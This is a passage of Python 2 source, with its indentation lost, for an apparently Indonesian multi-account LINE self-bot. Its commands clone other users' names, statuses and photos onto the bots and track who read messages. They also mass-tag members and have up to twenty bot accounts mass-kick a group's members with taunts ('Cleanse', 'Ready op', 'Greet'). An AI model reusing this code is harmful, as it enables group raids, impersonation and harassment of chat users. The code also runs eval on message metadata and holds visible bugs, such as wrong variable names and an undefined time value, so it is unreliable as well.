ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ????+? ? ¥ûDÏ ? ?+????||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ?")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "? ? ???+? ? ¥ûDÏ ? ?+??? ?\nRead : %s\n\n? Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["1","hay"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k11.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k12.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k13.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k14.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k15.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k16.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k17.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k18.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k19.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k20.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Kabur all","Ampih"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
k6.leaveGroup(msg.to)
k7.leaveGroup(msg.to)
k8.leaveGroup(msg.to)
k9.leaveGroup(msg.to)
k10.leaveGroup(msg.to)
k11.leaveGroup(msg.to)
k12.leaveGroup(msg.to)
k13.leaveGroup(msg.to)
k14.leaveGroup(msg.to)
k15.leaveGroup(msg.to)
k16.leaveGroup(msg.to)
k17.leaveGroup(msg.to)
k18.leaveGroup(msg.to)
k19.leaveGroup(msg.to)
k20.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["moleh"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
#cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
k6.leaveGroup(msg.to)
k7.leaveGroup(msg.to)
k8.leaveGroup(msg.to)
k9.leaveGroup(msg.to)
k10.leaveGroup(msg.to)
k11.leaveGroup(msg.to)
k12.leaveGroup(msg.to)
k13.leaveGroup(msg.to)
k14.leaveGroup(msg.to)
k15.leaveGroup(msg.to)
k16.leaveGroup(msg.to)
k17.leaveGroup(msg.to)
k18.leaveGroup(msg.to)
k19.leaveGroup(msg.to)
k20.leaveGroup(msg.to)
#kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["Crot"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members\nCrot aw.. Muncrat...!!!"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagi????devil smile??")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
if target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
gs = k11.getGroup(msg.to)
gs = k12.getGroup(msg.to)
gs = k13.getGroup(msg.to)
gs = k14.getGroup(msg.to)
gs = k15.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
